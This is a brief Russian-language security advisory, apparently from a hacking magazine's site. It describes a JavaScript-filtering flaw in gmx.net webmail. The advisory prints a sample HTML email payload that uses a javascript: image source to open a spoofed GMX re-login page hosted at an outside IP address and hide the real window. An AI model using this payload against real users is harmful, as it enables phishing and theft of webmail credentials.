Рекомендуем почитать:
Xakep #305. Многошаговые SQL-инъекции
gmx.net - бесплатная почтовая служба, работающая на 8 европейских языках. В ней найдена проблема при фильтровании Javascript, вложенного в HTML сообщение, что позволяет атакующему создавать HTML сообщения, содержащие потенциально опасный код.
Пример:
Sample 're-login' JavaScript:
<html><body> <img src="javascript:
gmx=window.open('http://216.147.4.38/gmx/index.html','gmx',width='1000',height='800');
window.opener.blur();window.opener.resizeTo(1,1); elf.blur();self.resizeTo(1,1);w=screen.availWidth;h=screen.availHeight-40;
gmx.moveTo(0,0);gmx.resizeTo(w,h); gmx.focus();">
<h4>mungo baby</h4></body></html>